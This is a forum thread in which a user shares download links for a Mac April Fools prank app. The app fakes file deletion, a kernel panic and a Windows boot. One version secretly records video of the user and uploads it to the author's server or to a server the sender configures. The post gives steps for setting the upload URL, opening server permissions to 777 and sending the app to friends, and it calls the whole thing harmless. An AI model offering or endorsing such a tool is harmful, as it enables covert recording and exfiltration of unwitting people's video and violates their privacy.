• Welcome to the Off-Topic/Schweb's Lounge

In addition to the Mac-Forums Community Guidelines, there are a few things you should pay attention to while in The Lounge.

Lounge Rules
    • If your post belongs in a different forum, please post it there.
    • While this area is for off-topic conversations, that doesn't mean that every conversation will be permitted. The moderators will, at their sole discretion, close or delete any threads which do not serve a beneficial purpose to the community.

Understand that while The Lounge is here as a place to relax and discuss random topics, that doesn't mean we will allow any topic. Topics which are inflammatory, hurtful, or otherwise clash with our Mac-Forums Community Guidelines will be removed.

Prank for the mac

Reaction score
Your Mac's Specs
se30 16MHZ 1.44MBHD Performa 630 CD 33MHZ 250MBHD iMac G3 333MHZ 60GBHD iMac G4 800MHZ 250GBHD
I wrote a small prank for april fools that I thought I might share with you guys.

What does it do?
1 shows a dialog with file names of stuff in your documents folder, desktop folder, and application folder and says it's deleting but it's not really.
2 shows a kernel panic.
3 Looks like your computer rebooted.
4 Shows the windows loading screen and takes a while on it as it does on windows it self.
5 Shows the windows desktop that's so famous.
6 Pops up a fake IE that is really webkit with a themed window that Rick Roll's you.
7 Once you close the IE window it quits.

I two versions. one that has a video recorder on it, and one that doesn't.

http://mrgeckosmedia.com/iTunesShake.zip (This one has the video recorder)
http://mrgeckosmedia.com/iTunesShake.app.zip (This one doesn't)

You can customize where it uploads the video that was recorded with these instructions.
1 Download the uploader http://mrgeckosmedia.com/uploadedFiles.zip
2 Upload to your own server and set the folder permissions to 777.
3 right click on the application, choose show package contents, go into the folder Contents and open info.plist.
4 Edit the videouploadurl entry and put in the url to your server.
5 Save and share with friends on aim or what ever.

you can see the video recorded in /tmp/.mgmrecorded.mov, or if you can't see invisible files use this "open /tmp/.mgmrecorded.mov" in terminal. Also if you want to see the video if you decided not to change the upload location you can pm me.

Remember I'm not responsible for your actions.

Hope you enjoy this harmless prank,
Mr. Gecko

Reaction score
Your Mac's Specs
MacBook Pro M1 Pro - 16 GB RAM - 512 GB SSD - macOS Monterey
I had a good laugh at this.

Shop Amazon

Shop for your Apple, Mac, iPhone and other computer products on Amazon.
We are a participant in the Amazon Services LLC Associates Program, an affiliate program designed to provide a means for us to earn fees by linking to Amazon and affiliated sites.